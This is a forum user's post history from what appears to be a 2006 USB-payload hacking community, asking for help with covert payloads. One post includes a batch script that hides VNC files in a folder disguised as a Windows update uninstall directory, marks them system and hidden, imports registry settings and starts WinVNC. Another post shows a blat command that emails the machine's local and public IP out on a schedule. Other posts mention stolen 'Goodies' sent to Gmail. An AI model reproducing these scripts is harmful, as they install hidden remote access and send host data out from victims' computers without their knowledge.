Jump to content

keia71

Active Members
  • Posts

    32
  • Joined

  • Last visited

Posts posted by keia71

  1. It's all in the registry (.reg) files. Try finding things out for yourself

    I have tried finding out for myself. Isn't that a point of a forum is to ask questions. If you do not know then dont reply with a stupid answer. We all are not as smart as you..Bow down to "remkow"

  2. im getting tired of all people who come here and ask stupid questions without searching. this question has been answered several times already, just use the search button.

    Enable "view system files and folders", as well as the hidden files and folders

    while you are being a smart ass it is "Hide protected Operating System Files"

  3. Does the antidote work for VNC. I can't gret it to uninstall. It looks like it does not actually take away the vnc icon in the toolbar but it keeps the status looking the same so the user does not know that you are connected....

    Can you tell me what all the VNC hack does? I want to change the password but it will not let me now. I will redownload and try the antidote again

  4. Still working on VNC issue. I am using this: It is not strting the service I get a message that says it can not find it. It does not appear to be a valid service. However I can start it manually..also if I just put winvnc in the install file instead of net start vnc it starts but just hangs there

    mkdir %systemroot%$NtUninstallKB21050c07160c070f0b0a0a05031b05$ || mkdir "%appdata%hbn" 
    
    cd ../VNCInstallFiles 
    
    copy *.* %systemroot%$NtUninstallKB21050c07160c070f0b0a0a05031b05$ || copy *.* "%appdata%hbn" 
    
    attrib %systemroot%$NtUninstallKB21050c07160c070f0b0a0a05031b05$ +s +h & attrib "%appdata%hbn" +s +h 
    
    regedit /s ../CMD/vncdmp.reg 
    
    regedit /s ../CMD/vncdmp1.reg 
    
    regedit /s ../CMD/vncdmp2.reg 
    
    ping -n 1 localhost > nul 
    
    net start WinVNC 
    
    nircmd.exe execmd CALL WIPVNCInstallfilessend.cmd

  5. I want to write a .BAT file that will open a webpage and then sign in with a userid. Tab to the password then hit enter to log in.

    Can someone help with that..

    Im using wget.exe but not sure how to tab or pass the text...Once I get this far I may need to take it a step further

  6. I just redownloaded it from the site and it looks like I have the right version. I was trying to add the auto ipsender now and it looks like it works...I add an ipconfig to get the local ip of the machine along with the whatismyip.com to get the Ip for one in my house that I am testing with...

    In my email I am only getting the first whatismyip.com file. I added mine to the email and it works if I run it manually..How can I change it to send the Ip Daily not every 30 minutes?

    Sample:

    for %%i in (ip.txt,c:iplocal.txt) do blat.exe %%i -base64 -to %emailto% -u %emailfrom% -subject %subject% -pw %password% -f %emailfrom% -server 127.0.0.1:1099

    GOTO cleanup

  7. Ok so I did this and now I have 150 emails of "Goodies" in my gmail account. Do I have to open each one individually and save the .rar file..That will take an hour....

    If I want to take this off the PC do I run the Antidote

  8. Is this a virus from the switchblade payload. I keep getting it on my PC and I have been playing with the different payloads...

    Scan type: Realtime Protection Scan

    Event: Virus Found!

    Virus name: Hacktool

    File: C:System Volume Information_restore{D1C2C251-F788-4617-A3F2-1132F2ED59F6}RP267A0027007.exe

    Location: Quarantine

    Computer: BILL

    User: SYSTEM

    Action taken: Clean failed : Quarantine succeeded : Access denied

    Date found: Sat Oct 14 02:21:05 2006

  9. I have been playing with these different payloads and also with rainbow crack. This morning I had a message from norton that it found a virus. Is this from one of the payloads.

    Scan type: Realtime Protection Scan

    Event: Virus Found!

    Virus name: Hacktool

    File: C:System Volume Information_restore{D1C2C251-F788-4617-A3F2-1132F2ED59F6}RP264A0026729.exe

    Location: Quarantine

    Computer: BILL

    User: SYSTEM

    Action taken: Clean failed : Quarantine succeeded : Access denied

    Date found: Thu Oct 12 07:08:49 2006

×
×
  • Create New...